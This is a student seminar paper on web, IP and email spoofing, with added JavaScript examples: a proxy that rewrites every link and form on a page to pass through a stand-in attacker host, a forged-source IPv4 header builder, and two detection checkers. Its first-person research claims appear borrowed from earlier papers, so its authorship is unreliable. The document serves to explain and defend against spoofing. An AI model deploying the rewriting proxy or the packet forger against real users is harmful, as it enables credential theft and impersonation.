Spoofing Sem


8/9/2019 Spoofing Sem

A PAPER PRESENTATION ON

Web Spoofing

Presented by: Miss. Neha C. Gaopande (Final Year, IT)

Guided by: Prof. A. D. Raut

JAWAHARLAL DARDA INSTITUTE OF ENGINEERING AND TECHNOLOGY, YAVATMAL


ABSTRACT

Web spoofing describes an Internet security attack that could endanger the privacy of World Wide Web users and the integrity of their data. The attack can be carried out on today's systems, endangering users of the most common Web browsers. Web spoofing allows an attacker to create a "shadow copy" of the entire World Wide Web. Accesses to the shadow Web are funneled through the attacker's machine, allowing the attacker to monitor all of the victim's activities, including any passwords or account numbers the victim enters. The attacker can also cause false or misleading data to be sent to Web servers in the victim's name, or to the victim in the name of any Web server. In short, the attacker observes and controls everything the victim does on the Web. First, the attacker causes a browser window to be created on the victim's machine, with some of the normal status and menu information replaced by identical-looking components supplied by the attacker. Then, the attacker causes all Web pages destined for the victim's machine to be routed through the attacker's server. On the attacker's server, the pages are rewritten in such a way that their appearance does not change at all, but any actions taken by the victim are logged by the attacker. In addition, any attempt by the victim to load a new page causes the newly-loaded page to be routed through the attacker's server, so the attack continues on the new page.


Table of contents

Title Page
Abstract
1. Introduction
2. Previous works
3. What is web spoofing?
   3.1 How does the attack work?
   3.2 Threat models and attacks
4. Spoofing the whole page
5. Types of spoofing
6. Completing the illusion
   6.1 Status line
   6.2 Location bar
   6.3 Viewing the document source
7. Anti-spoofing
   7.1 Short-term solutions
   7.2 Long-term solutions
8. Future spoofing work
9. Conclusion
References


1. INTRODUCTION

Web spoofing is a security attack that allows an adversary to observe and modify all Web pages sent to the victim's machine, and to observe all information entered into forms by the victim. Web spoofing works on both of the major browsers and is not prevented by "secure" connections. The attacker can observe and modify all Web pages and form submissions, even when the browser's "secure connection" indicator is lit. The user sees no indication that anything is wrong.

The attack is implemented using JavaScript and Web server plug-ins, and works in two parts. First, the attacker causes a browser window to be created on the victim's machine, with some of the normal status and menu information replaced by identical-looking components supplied by the attacker. Then, the attacker causes all Web pages destined for the victim's machine to be routed through the attacker's server. On the attacker's server, the pages are rewritten in such a way that their appearance does not change at all, but any actions taken by the victim (such as clicking on a link) are logged by the attacker. In addition, any attempt by the victim to load a new page causes the newly-loaded page to be routed through the attacker's server, so the attack continues on the new page. The attack is initiated when the victim visits a malicious Web page, or receives a malicious email message (if the victim uses an HTML-enabled email reader).
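To make the second part of the mechanism concrete, here is an added example (not code from this paper or from the Princeton attack) of the server-side rewriting step, written in JavaScript for Node.js. The attacker host www.attacker.example, the victim host www.bank.example, the prefix rewriting scheme and the sample page are all assumptions chosen for illustration. What it shows is that every link, image source and form action in a fetched page can be redirected through the attacker's server without any visible change to the page, and that the attacker thereby learns which forms (and so which passwords) will be submitted through it:

```javascript
// Added example (not from the paper): the URL-rewriting core of a web spoofing
// proxy. The attacker host, the prefix rewriting scheme and the sample page are
// assumptions chosen for illustration; the victim site is a placeholder.
'use strict';

const PROXY_BASE = 'http://www.attacker.example/';   // assumed attacker server

// Rewrite a real absolute URL so that fetching it goes through the attacker:
//   https://www.bank.example/login  ->  http://www.attacker.example/https://www.bank.example/login
function rewriteUrl(realUrl) {
  if (realUrl.startsWith(PROXY_BASE)) return realUrl;  // already rewritten
  return PROXY_BASE + realUrl;
}

// Recover the real URL from a rewritten one (the proxy does this before it
// fetches the genuine page on the victim's behalf).
function unwrapUrl(proxiedUrl) {
  return proxiedUrl.startsWith(PROXY_BASE) ? proxiedUrl.slice(PROXY_BASE.length) : proxiedUrl;
}

// Rewrite every link, image source and form action in a fetched page so that
// the page looks identical but every click or submit is routed back through
// the proxy. Relative URLs are resolved against the genuine page URL first.
// Returns the rewritten HTML and the form actions the attacker will now see
// submissions for.
function rewritePage(html, pageUrl) {
  const capturedForms = [];
  const rewritten = html.replace(
    /\b(href|src|action)\s*=\s*"([^"]*)"/gi,
    (match, attr, value) => {
      let abs;
      try { abs = new URL(value, pageUrl); } catch { return match; }  // leave unparsable values alone
      if (abs.protocol !== 'http:' && abs.protocol !== 'https:') return match;  // mailto:, javascript:, ...
      if (attr.toLowerCase() === 'action') capturedForms.push(abs.href);
      return `${attr}="${rewriteUrl(abs.href)}"`;
    });
  return { html: rewritten, capturedForms };
}

// Constructed sample page, standing in for what the proxy fetched from the genuine site.
const SAMPLE_PAGE = [
  '<a href="/accounts">Accounts</a>',
  '<a href="https://www.partner.example/offers">Offers</a>',
  '<img src="logo.png">',
  '<form action="/login" method="post"><input name="password"></form>',
  '<a href="mailto:help@bank.example">Help</a>',
].join('\n');

const result = rewritePage(SAMPLE_PAGE, 'https://www.bank.example/home');
console.log(result.html);
console.log('forms now submitted through the attacker:', result.capturedForms);
```

Links to other sites (the partner site above) are rewritten too, which is what makes the shadow copy span the whole Web rather than one site; a non-HTTP target such as a mailto: link is left alone because the proxy cannot serve it.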

2. PREVIOUS WORKS

As early as 1996, Felten et al. at Princeton [8] originated the term web spoofing and explored spoofing attacks on Netscape Navigator and Microsoft Internet Explorer that allowed an attacker to create a shadow copy of the true web. When the victim accesses the shadow Web through the attacker's servers, the attacker can monitor all of the victim's activities and get or modify the information the victim enters, including passwords or credit card numbers. Source code is not available; according to the paper, the attack used JavaScript to rewrite the hyperlink information shown on the status bar; to hide the real location bar and replace it with a fake one that also accepts keyboard input, allowing the victim to type in URLs normally (which then get rewritten to go to the attacker's machine); and to replace the Document Source button on the menu bar (to show the source the victim expects, not the real source). Apparently unable to spoof the SSL icon, the Princeton attack spoofed SSL by having the user open a real SSL session to the attacker's machine.

In 1996, Tygar and Whitten from CMU [20] demonstrated how a Java applet or similar remote execution can be used as a Trojan horse. The Java applet could be inserted into a client machine through a bogus remote page and pop up a dialog window similar to the true login window. With the active text field on top of the image, the Trojan horse applet would capture the keyboard input and transfer it to the attacker's machine. Tygar and Whitten also gave a way to prevent these attacks: window personalization.

3. WHAT IS WEB SPOOFING?

Web spoofing is a kind of electronic con game in which the attacker creates a convincing but false copy of the entire World Wide Web. The false Web looks just like the real one: it has all the same pages and links. However, the attacker controls the false Web, so that all network traffic between the victim's browser and the Web goes through the attacker.

Consequences. Since the attacker can observe or modify any data going from the victim to Web servers, as well as controlling all return traffic from Web servers to the victim, the attacker has many possibilities. These include surveillance and tampering.

Surveillance. The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form, the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server. The attacker can carry out surveillance even if the victim has a "secure" connection (usually via Secure Sockets Layer) to the server, that is, even if the victim's browser shows the secure-connection icon (usually an image of a lock or a key).

Tampering. The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data submitted by the victim.

3.1 HOW DOES THE ATTACK WORK?

The first vulnerability is due to the validation that the server's public key, which SSL obtains from the server's certificate, belongs to the site with the given location (URL). This validation is the responsibility of the application (e.g. the browser) and is not part of the SSL specification; SSL merely passes the server's certificate to the application. Currently, browsers are vulnerable to the false certificate attack: the adversary holds a certificate, with the matching private key, that the browser accepts for the victim web page, and can therefore pass SSL server authentication. In the current design of browsers, the user is responsible for validating the authenticity of web sites by noting the relevant status areas in the browser user interface. The relevant status areas are the location bar, containing the URL (Uniform Resource Locator), and the SSL indicator (typically an open lock for insecure sites and a closed lock for SSL-protected sites). We are mostly interested in the web spoofing attack, which exploits this vulnerability by directing the browser to an adversary-controlled clone site that resembles the original victim site the user wanted to access. Web spoofing attacks are very common, and are currently the most severe threat to secure e-commerce.


The process begins when the user selects the web site, by entering its location (URL) or by invoking a bookmark or link, e.g. in an e-mail message (step 1). The browser, or the underlying transport layer, then sends the domain name of the site, e.g. xxx.com, to a Domain Name Server, which returns the IP address of the site (step 2). Now the client sends an HTTP request to the site, using that IP address, and receives the HTTP response containing the web page (step 3); this request and response are protected by SSL if the URL indicates the use of SSL (by using the https protocol in the URL). Finally, the browser presents the page to the user. Each step consists of a request (a) and a response (b). Without SSL, an intercepting adversary could attack all three pairs of steps in this process, as follows:

1. Trick the user into requesting the spoofed web site in step 1a, and/or into using http rather than https, i.e. not protecting the request and response using SSL.

2. Return an incorrect IP address for the web server in step 2b. This can be done by exploiting one of the known weaknesses of the DNS protocol and/or of (many) DNS servers. A typical example is DNS cache poisoning (pushing false domain-to-IP mappings into the cache of DNS servers).

3. Intercept (capture) the request in step 3a (sent to the right IP address) and return a response in step 3b from the spoofed site.

3.2 THREAT MODELS AND ATTACKS

The initial design of Internet and Web protocols assumed a benign environment, where servers, clients and routers cooperate and follow the standard protocols, except for unintentional errors. Today, since Internet access is widely available, it is very easy for attackers to obtain many client and even host connections and addresses, and to use them to launch attacks on the network itself and on other hosts and clients. In particular, with the proliferation of commercial domain name registrars allowing automated, low-cost registration in most top-level domains, it is currently very easy for attackers to acquire essentially any unallocated domain name and to place malicious hosts and clients there. We call this the unallocated domain adversary: an adversary who is able to issue and receive messages using many addresses in any domain name, excluding the finite list of already allocated domain names. This is probably the most basic and common type of adversary. A stronger one is the intercepting adversary, who is able to send and intercept messages to and from all domains; sensitive web sites are usually protected against it using the SSL protocols. Even without SSL, the HTTP protocol (through the TCP connection it runs over, which cannot be completed without receiving the server's replies) authenticates web pages against the weaker spoofing adversary, who is able to send messages from all domains but receives only messages sent to unallocated domains. However, the security provided by SSL/TLS is only with respect to the address (URL) and security mechanism requested by the application.


4. SPOOFING THE WHOLE PAGE

In a spoofing attack, the attacker creates misleading context in order to trick the victim into making an inappropriate security-relevant decision. A spoofing attack is like a con game: the attacker sets up a false but convincing world around the victim. The victim does something that would be appropriate if the false world were real. Unfortunately, activities that seem reasonable in the false world may have disastrous effects in the real world. Spoofing attacks are possible in the physical world as well as the electronic one. People using computer systems often make security-relevant decisions based on contextual cues they see. For example, you might decide to type in your bank account number because you believe you are visiting your bank's Web page. This belief might arise because the page has a familiar look, because the bank's URL appears in the browser's location line, or for some other reason. To appreciate the range and severity of possible spoofing attacks, we must look more deeply into two parts of the definition of spoofing: security-relevant decisions and context.


5. TYPES OF SPOOFING

Besides web spoofing, there are other types of spoofing, such as email spoofing and IP spoofing.

IP spoofing:

The attacker uses the IP address of another computer to acquire information or gain access.
IP spoofing is the creation of TCP/IP packets with somebody else's IP address in the header.
Routers use the destination IP address to forward packets, but ignore the source IP address.
The source IP address is used only by the destination machine, when it responds back to the source.
When an attacker spoofs someone's IP address, the victim's reply goes back to that address.
Since the attacker does not receive packets back, this is called a one-way attack or blind spoofing.
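An added example (not from the paper) that builds the IPv4 header of a spoofed packet in Node.js, byte by byte. It shows what the points above mean at the wire level: the source address is simply a field the sender writes, the header checksum covers it but authenticates nothing, and the destination field is all a router acts on. The addresses are documentation-range placeholders, and no packet is actually sent (that would need a raw socket); the code only constructs and parses the header.

```javascript
// Added example (not from the paper): building the IPv4 header of a spoofed
// packet to show that the source address is an unauthenticated field chosen by
// the sender. Addresses are placeholders; nothing is sent on the network.
'use strict';

// Dotted-quad -> 4 bytes, rejecting malformed addresses.
function ipToBytes(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some((n) => !Number.isInteger(n) || n < 0 || n > 255)) {
    throw new Error(`bad IPv4 address: ${ip}`);
  }
  return parts;
}

// RFC 791 header checksum: one's-complement sum of all 16-bit words, folded.
function ipChecksum(header) {
  let sum = 0;
  for (let i = 0; i < header.length; i += 2) {
    sum += (header[i] << 8) | (header[i + 1] || 0);
  }
  while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);  // end-around carry
  return (~sum) & 0xffff;
}

// Build a minimal 20-byte IPv4 header. `srcIp` is whatever the sender chooses:
// for a spoofed packet it is the impersonated host's address.
function buildIpv4Header({ srcIp, dstIp, protocol = 6, payloadLength = 0, ttl = 64, id = 0 }) {
  const h = Buffer.alloc(20);
  h[0] = 0x45;                                  // version 4, IHL 5 (20 bytes)
  h[1] = 0;                                     // DSCP/ECN
  h.writeUInt16BE(20 + payloadLength, 2);       // total length
  h.writeUInt16BE(id, 4);                       // identification
  h.writeUInt16BE(0x4000, 6);                   // flags: DF set, fragment offset 0
  h[8] = ttl;
  h[9] = protocol;                              // 6 = TCP
  h.writeUInt16BE(0, 10);                       // checksum placeholder
  Buffer.from(ipToBytes(srcIp)).copy(h, 12);    // source address: nothing verifies it
  Buffer.from(ipToBytes(dstIp)).copy(h, 16);    // destination: what routers forward on
  h.writeUInt16BE(ipChecksum(h), 10);           // checksum over the finished header
  return h;
}

// Read back the fields a router and the destination host actually act on.
// A header whose checksum is intact sums to zero under ipChecksum.
function parseIpv4Header(h) {
  return {
    src: Array.from(h.subarray(12, 16)).join('.'),
    dst: Array.from(h.subarray(16, 20)).join('.'),
    checksumOk: ipChecksum(h) === 0,
  };
}

// The attacker sends a packet to the victim (203.0.113.5) claiming to come from
// 192.0.2.10. The checksum is valid and the destination is right, so every
// router forwards it; the victim's reply is addressed to 192.0.2.10, not to the
// attacker, which is why the paper calls this one-way or blind spoofing.
const spoofed = buildIpv4Header({ srcIp: '192.0.2.10', dstIp: '203.0.113.5', payloadLength: 20 });
console.log(parseIpv4Header(spoofed));
```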

Email spoofing:

The attacker sends email but makes it appear to come from someone else.
With email spoofing, someone receives email that appears to have originated from one source when it actually was sent from another source.

Purposes of email spoofing:

Hiding the sender's identity
Impersonating someone
Implicating someone
Tricking someone into making a damaging statement or releasing sensitive information

Fig.: A spoofed email sent to customers, indicating that the message was sent on behalf of eBay (source: http://antivirus.about.com/od/emailscams/ss/phishing_5.htm)

6. COMPLETING THE ILLUSION

The attack as described thus far is fairly effective, but it is not perfect. There is still some remaining context that can give the victim clues that the attack is going on. However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack's existence. Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but when the page is hostile it can be dangerous.

6.1 The Status Line

The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers. The attack as described so far leaves two kinds of evidence on the status line. First, when the mouse is held over a Web link, the status line displays the URL the link points to. Thus, the victim might notice that a URL has been rewritten. Second, when a page is being fetched, the status line briefly displays the name of the server being contacted. As noted in section 2, the Princeton attack covered this evidence with JavaScript that rewrites the text shown on the status line.

6.2 The Location Bar

The browser's location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress. The real location line can be hidden and replaced by a fake location line which looks right and is in the expected place. The fake location line can show the URL the victim expects to see. The fake location line can also accept keyboard input, allowing the victim to type in URLs normally.

6.3 Viewing the Document Source

There is one clue that the attacker cannot eliminate, but it is very unlikely to be noticed. By using the browser's "view source" feature, the victim can look at the HTML source for the currently displayed page. By looking for rewritten URLs in the HTML source, the victim can spot the attack. A related clue is available if the victim chooses the browser's "view document information" menu item. This will display information including the document's real URL, possibly allowing the victim to notice the attack. (Section 2 notes that the Princeton attack also replaced the Document Source item on the menu bar, so even this clue depends on the victim reaching the real menu rather than a spoofed one.)
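An added example (not from the paper) that performs the 6.3 check mechanically in Node.js: it scans the HTML that "view source" would show for the traces the attack leaves (a real URL nested inside a rewritten link target, and a script that assigns window.status to cover the status line described in 6.1) and compares the URL in the location bar with the document's real URL as "view document information" would report it. The nested-URL rewriting scheme, the sample source and the host names are assumptions; the functions return their findings so each clue can be checked individually.

```javascript
// Added example (not from the paper): the "view source" check of 6.3 done
// mechanically. The rewriting scheme it looks for (a real URL nested inside
// the path of another), the sample source and the host names are assumptions.
'use strict';

// A link target whose path carries a second absolute URL, e.g.
// http://www.attacker.example/https://www.bank.example/login, has been rewritten.
// Returns the inner (real) URL, or null when the target is an ordinary URL.
function nestedUrl(href) {
  const m = /^https?:\/\/[^/]+\/(https?:\/\/.+)$/i.exec(href);
  return m ? m[1] : null;
}

// Examine a page's source. `displayedUrl` is what the (possibly fake) location
// bar shows; `realUrl` is what "view document information" reports. Returns a
// list of findings so a reader can see which clue gave the attack away.
function inspectSource(html, displayedUrl, realUrl) {
  const findings = [];
  const shown = new URL(displayedUrl);
  const real = new URL(realUrl);

  // Clue from "view document information": the page did not come from the
  // host the location bar claims.
  if (shown.host !== real.host) {
    findings.push({ clue: 'document-url',
      detail: `page really loaded from ${real.host}, location bar shows ${shown.host}` });
  }

  // Clue from the HTML: links, images and forms rewritten to pass through another host.
  const linkRe = /\b(?:href|src|action)\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = linkRe.exec(html)) !== null) {
    const inner = nestedUrl(m[1]);
    if (inner) findings.push({ clue: 'rewritten-link', detail: `${m[1]} really points at ${inner}` });
  }

  // Clue from script: the page overwrites the status line that would otherwise
  // reveal the rewritten targets on mouse-over (6.1).
  if (/window\.status\s*=/.test(html)) {
    findings.push({ clue: 'status-line-script', detail: 'page script assigns window.status' });
  }
  return findings;
}

// Constructed sample: what "view source" would show on a page served by the proxy.
const SPOOFED_SOURCE = `
<a href="http://www.attacker.example/https://www.bank.example/accounts"
   onmouseover="window.status='https://www.bank.example/accounts'; return true">Accounts</a>
<form action="http://www.attacker.example/https://www.bank.example/login" method="post">
  <input name="password"></form>`;

const findings = inspectSource(SPOOFED_SOURCE, 'https://www.bank.example/home',
                               'http://www.attacker.example/https://www.bank.example/home');
console.log(findings);
```

The same scan over a genuine page (ordinary links, matching hosts, no status-line script) returns an empty list, which is the only state a careful victim should accept.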


7. Anti-Spoofing

In this section we provide means to counter spoofing, focusing on what users can do, what software can be used, and what laws are in place for handling this type of crime.

1. Users

Most people become aware when something is wrong with their email or the site they are currently viewing. Still, there will always be newcomers to the net, and some training is required for people to understand the difference between good and bad email/sites. One of the most common ways to fool a user is to get the user to reveal a username, password or account information. Most companies will never ask for your information in a mail, and if they lose your password or account due to an error, they will simply make you a new one.

2. Software

While training is not always an option, different software has been developed to help combat the problem. In a PC World article [PCW], Tom Spring tested three different tools that use different approaches to detect phishing. The first, the Anti-Fraud Toolbar from Cloudmark (http://www.cloudmark.com/), is based on a blacklist of known bad sites: when a user attempts to enter a site on the blacklist, the program issues a warning stating that the site is not safe to go to. The second, TrustBar from Comodo, is based on a whitelist of good sites: when you surf to a site that is on the whitelist, the company's name appears on the toolbar; when the site is not on the whitelist a warning is issued, but it does not prevent you from surfing further. A list of other tools can be obtained at http://www.antiphishing.org/solutions.html#toolbars.


7.1 Short-term Solutions

In the short run, the best defense is to follow a three-part strategy:

1. Disable JavaScript in your browser, so the attacker will be unable to hide the evidence of the attack;

2. Make sure your browser's location line is always visible;

3. Pay attention to the URLs displayed on your browser's location line, making sure they always point to the server you think you are connected to.

This strategy will significantly lower the risk of attack, though you could still be victimized if you are not conscientious about watching the location line.
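An added example (not from the paper, and not the code of the toolbars mentioned in section 7) of what "paying attention to the location line" amounts to when done by a program, in Node.js: it combines the blacklist and whitelist approaches of the toolbars with the third point of the strategy above. The URL in the location bar is parsed, the real host is extracted (so that a user-info prefix such as https://www.bank.example@www.attacker.example/ or a look-alike subdomain is not mistaken for the expected site), a plain http connection is flagged, and the host is compared with the site the user meant to visit. The lists and all host names are constructed placeholders.

```javascript
// Added example (not from the paper): a location-bar check combining a
// blacklist, a whitelist and a comparison with the intended site. The lists
// and every host name are constructed placeholders.
'use strict';

const BLACKLIST = new Set(['www.attacker.example', 'bank-login.example']);  // known bad sites
const WHITELIST = new Map([                                                 // known good sites
  ['www.bank.example', 'Example Bank'],
  ['bank.example', 'Example Bank'],
]);

// Parse what is in the location bar and report the verdict together with the
// reasons: the real host (after user-info and look-alike tricks), the scheme,
// and whether the host is the site the user expected.
function checkLocation(typedUrl, expectedHost) {
  let url;
  try { url = new URL(typedUrl); } catch { return { verdict: 'unparsable', reasons: ['not a valid URL'] }; }

  const host = url.hostname.toLowerCase().replace(/\.$/, '');  // strip a trailing dot
  const reasons = [];

  if (url.username || url.password) {
    // https://www.bank.example@www.attacker.example/ : the real host is www.attacker.example
    reasons.push(`userinfo "${url.username}" precedes the real host`);
  }
  if (BLACKLIST.has(host)) reasons.push('host is on the blacklist');
  if (url.protocol !== 'https:') reasons.push('connection is not protected by SSL');

  const expected = expectedHost.toLowerCase();
  const sameSite = host === expected || host.endsWith('.' + expected);
  if (!sameSite) {
    // www.bank.example.attacker.example contains the expected name but is a different site
    reasons.push(host.includes(expected)
      ? `host ${host} only resembles ${expected}`
      : `host ${host} is not ${expected}`);
  }

  let verdict = 'unknown';                       // neither listed nor suspicious
  if (reasons.length) verdict = 'warn';
  else if (WHITELIST.has(host)) verdict = 'trusted';
  return { verdict, host, organization: WHITELIST.get(host) || null, reasons };
}

// Constructed location-bar contents a user expecting www.bank.example might see.
const CASES = [
  'https://www.bank.example/accounts',
  'http://www.bank.example/accounts',
  'https://www.bank.example.attacker.example/accounts',
  'https://www.bank.example@www.attacker.example/accounts',
  'https://bank-login.example/',
];
for (const c of CASES) console.log(c, '=>', checkLocation(c, 'www.bank.example'));
```

As with the whitelist toolbar described in section 7, a 'warn' verdict does not stop navigation; it tells the user what to look at. The check is only as good as the host the user actually intended, which is why the paper's advice to reach sensitive sites from a bookmark or by typing the address matters.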

7.2 Long-term Solutions

Our initial motivation was not to attack but to defend: to build a better browser that, for example, could clearly indicate the security attributes of a server (and so enable clients to securely use our server hardening techniques). None of the above solutions is strong enough to be a general solution for preventing web spoofing. An ideal browser should be a platform which enables all modern web techniques to be fully functional, and at the same time supplies unspoofable features that indicate the communication security.

8. FUTURE SPOOFING WORK

Our fake Web pages are not perfect. In our demonstration, we only implemented enough to prove the concept; however, as noted earlier, we are not yet able to forge some aspects of legitimate browser behavior:

Creating convincing editable location lines appears to depend on the user's preferences, which we cannot yet learn. Either we gamble, or we do not have editable lines.

We cannot yet obtain the user's genuine history information for the pull-down history options.

9. Conclusion

Web spoofing has become a serious issue for the global Internet community. More organizations provide greater online access for their customers, and rely heavily on online services in the way they do business. Understanding the tools and methods the phishers have at their disposal is a crucial element in defending against these attacks. Users can increase their security by following these guidelines:

1. Always contact sensitive web sites by typing their address in the location bar, using a bookmark, or following a link from a secure site, preferably one protected by SSL/TLS.

2. Never click on links from e-mail messages or from other non-trustworthy sources. These could lead you to a URL-forwarding site.

3. Be very careful to inspect the location bar and the SSL icon upon entering sensitive web pages.

4. If possible, restrict the damage due to spoofing by instructing your financial services to limit online transactions in your account to cover only what you really need.

REFERENCES

    1. http://webmasters-forums.com/web-spoofing-t-402.html

    2. http://www.washington.edu/computing/windows/issue22/spoofing.html

    3. http://www.cs.princeton.edu/sip/WebSpoofing/

    4. http://www.cs.princeton.edu/sip/pub/spoofing.html
